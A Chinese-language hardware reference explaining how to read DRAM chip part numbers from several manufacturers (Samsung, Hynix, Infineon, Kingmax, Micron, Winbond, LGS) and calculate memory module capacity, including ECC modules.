　　知道了内存颗粒编码主要数位的含义，拿到一个内存条后就非常容易计算出它的容量。例如一条三星DDR内存，使用18片SAMSUNG K4H280838B-TCB0颗粒封装。颗粒编号第4、5位“28”代表该颗粒是128Mbits，第6、7位“08”代表该颗粒是8位数据带宽，这样我们可以计算出该内存条的容量是128Mbits（兆数位） × 16片/8bits=256MB（兆字节）。

　　注：“bit”为“数位”，“B”即字节“byte”，一个字节为8位则计算时除以8。关于内存容量的计算，文中所举的例子中有两种情况：一种是非ECC内存，每8片8位数据宽度的颗粒就可以组成一条内存；另一种ECC内存，在每64位数据之后，还增加了8位的ECC校验码。通过校验码，可以检测出内存数据中的两位错误，纠正一位错误。所以在实际计算容量的过程中，不计算校验位，具有ECC功能的18片颗粒的内存条实际容量按16乘。在购买时也可以据此判定18片或者9片内存颗粒贴片的内存条是ECC内存。

　　Hynix(Hyundai)现代

　　现代内存的含义：

　　HY5DV641622AT-36

　　HY XX X XX XX XX X X X X X XX

　　1 2 3 4 5 6 7 8 9 10 11 12

　　1、HY代表是现代的产品

　　2、内存芯片类型：(57=SDRAM，5D=DDR SDRAM)；

　　3、工作电压：空白=5V，V=3.3V,U=2.5V

　　4、芯片容量和刷新速率：16=16Mbits、4K Ref；64=64Mbits、8K Ref；65=64Mbits、4K Ref；128=128Mbits、8K Ref；129=128Mbits、4K Ref；256=256Mbits、16K Ref；257=256Mbits、8K Ref

　　5、代表芯片输出的数据位宽：40、80、16、32分别代表4位、8位、16位和32位

　　6、BANK数量：1、2、3分别代表2个、4个和8个Bank，是2的幂次关系

　　7、I/O界面：1 :SSTL_3、 2 :SSTL_2

　　8、芯片内核版本：可以为空白或A、B、C、D等字母，越往后代表内核越新

　　9、代表功耗：L=低功耗芯片，空白=普通芯片

　　10、内存芯片封装形式：JC=400mil SOJ，TC=400mil TSOP-Ⅱ，TD=13mm TSOP-Ⅱ，TG=16mm TSOP-Ⅱ

　　11、工作速度：55 :183MHZ、5 :200MHZ、45 :222MHZ、43 :233MHZ、4 :250MHZ、33 :300NHZ、L DR200、H DR266B、 K DR266A

　　Infineon（亿恒）

　　Infineon是德国西门子的一个分公司，目前国内市场上西门子的子公司Infineon生产的内存颗粒只有两种容量：容量为128Mbits的颗粒和容量为256Mbits的颗粒。编号中详细列出了其内存的容量、数据宽度。Infineon的内存队列组织管理模式都是每个颗粒由4个Bank组成。所以其内存颗粒型号比较少，辨别也是最容易的。

　　HYB39S128400即128MB/ 4bits，“128”标识的是该颗粒的容量，后三位标识的是该内存数据宽度。其它也是如此，如：HYB39S128800即128MB/8bits；HYB39S128160即128MB/16bits；HYB39S256800即256MB/8bits。

　　Infineon内存颗粒工作速率的表示方法是在其型号最后加一短线，然后标上工作速率。

　　-7.5——表示该内存的工作频率是133MHz；

　　-8——表示该内存的工作频率是100MHz。

　　例如：

　　1条Kingston的内存条，采用16片Infineon的HYB39S128400-7.5的内存颗粒生产。其容量计算为： 128Mbits（兆数位）×16片/8=256MB（兆字节）。

　　1条Ramaxel的内存条，采用8片Infineon的HYB39S128800-7.5的内存颗粒生产。其容量计算为： 128Mbits（兆数位） × 8 片/8=128MB（兆字节）。

　　KINGMAX、kti

　　KINGMAX内存的说明

　　Kingmax内存都是采用TinyBGA封装（Tiny ball grid array）。并且该封装模式是专利产品，所以我们看到采用Kingmax颗粒制作的内存条全是该厂自己生产。Kingmax内存颗粒有两种容量：64Mbits和128Mbits。在此可以将每种容量系列的内存颗粒型号列表出来。

　　容量备注：

　　KSVA44T4A0A——64Mbits，16M地址空间 × 4位数据宽度；

　　KSV884T4A0A——64Mbits，8M地址空间 × 8位数据宽度；

　　KSV244T4XXX——128Mbits，32M地址空间 × 4位数据宽度；

　　KSV684T4XXX——128Mbits，16M地址空间 × 8位数据宽度；

　　KSV864T4XXX——128Mbits，8M 地址空间 × 16位数据宽度。

　　Kingmax内存的工作速率有四种状态，是在型号后用短线符号隔开标识内存的工作速率：

　　-7A——PC133 /CL=2；

　　-7——PC133 /CL=3；

　　-8A——PC100/ CL=2；

　　-8——PC100 /CL=3。

　　例如一条Kingmax内存条，采用16片KSV884T4A0A-7A 的内存颗粒制造，其容量计算为： 64Mbits（兆数位）×16片/8=128MB（兆字节）。

　　Micron（美光）

　　以MT48LC16M8A2TG-75这个编号来说明美光内存的编码规则。

　　含义：

　　MT——Micron的厂商名称。

　　48——内存的类型。48代表SDRAM；46 代表DDR。

　　LC——供电电压。LC代表3V；C 代表5V；V 代表2.5V。

　　16M8——内存颗粒容量为128Mbits，计算方法是：16M（地址）×8位数据宽度。

　　A2——内存内核版本号。

　　TG——封装方式，TG即TSOP封装。

　　-75——内存工作速率，-75即133MHz；-65即150MHz。

　　实例：一条Micron DDR内存条，采用18片编号为MT46V32M4-75的颗粒制造。该内存支持ECC功能。所以每个Bank是奇数片内存颗粒。

　　其容量计算为：容量32M ×4bit ×16 片/ 8=256MB（兆字节）。

　　Winbond（华邦）

　　含义说明：

　　W XX XX XX XX

　　1 2 3 4 5

　　1、W代表内存颗粒是由Winbond生产

　　2、代表显存类型：98为SDRAM，94为DDR RAM

　　3、代表颗粒的版本号：常见的版本号为B和H；

　　4、代表封装，H为TSOP封装，B为BGA封装，D为LQFP封装

　　5、工作频率:0：10ns、100MHz；8：8ns、125MHz；Z：7.5ns、133MHz；Y：6.7ns、150MHz；6：6ns、166MHz；5：5ns、200MHz

LGS（乐金LG）：
LGS的内存可以说是目前市场上见到的最多，也是最广泛的内存了，所以LGS应该首先排第一位。
LGS的内存编码规则：
GM 72 X XX XX X X X X X XXX
1 2 3 4 5 6 7 8 9 10 11
定义：
1、GM代表LGS公司。
2、72代表SDRAM。
3、V代表3V电压。
4、内存单位容量和刷新单位：其中：16：16M，4K刷新；17：16M，2K刷新；28：128M，4K刷新；64：64M，16K刷新。65：64M，8K刷新；66：64M，4K刷新。
5、数据带宽：4：4位，8：8位，16：16位，32：32位。
6、芯片组成：1：1BAND，2：2BANK，4：4BANK，8：8BANK
7、I／O界面：一般为1
8、产品系列：从A至F。
9、功耗：空白则是普通，L是低功
10、封装模式：一般为T（TSOP）
11、速度：其中：8：8NS，7K：10NS（CL2），7J（10NS，CL2&3），10K（10NS[一说15NS]，PC66），12（12NS，83HZ），15（15NS，66HZ）